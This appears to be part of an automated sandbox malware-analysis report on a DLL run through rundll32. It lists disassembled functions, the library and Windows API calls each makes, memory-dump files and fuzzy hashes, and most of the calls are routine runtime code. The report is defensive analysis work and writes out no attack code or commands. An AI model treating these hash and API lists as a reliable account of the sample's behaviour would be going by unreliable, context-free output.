                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction ID: 44ba6f7c8c4d87fab9365827d96dd2610bd0c5aaa7a7505ecb33efb7383b78fb
                                                                                                                      • Opcode Fuzzy Hash: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction Fuzzy Hash: 2BC14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                      • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                      • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      • Opcode ID: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction ID: 16a76d7c805c79391281f5fd2ee222f5103365245b1589172f68e38ef912b2cf
                                                                                                                      • Opcode Fuzzy Hash: 56d6be33c1e81382978df41dcaf565bd3426e610fdbe01e8120d94cf6c63e55f
                                                                                                                      • Instruction Fuzzy Hash: B62127755002556FDB21DFB49C81BAEB7F8DF59241FA14066F984D7240DB709A40CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                      • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                      • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                      • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                      • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
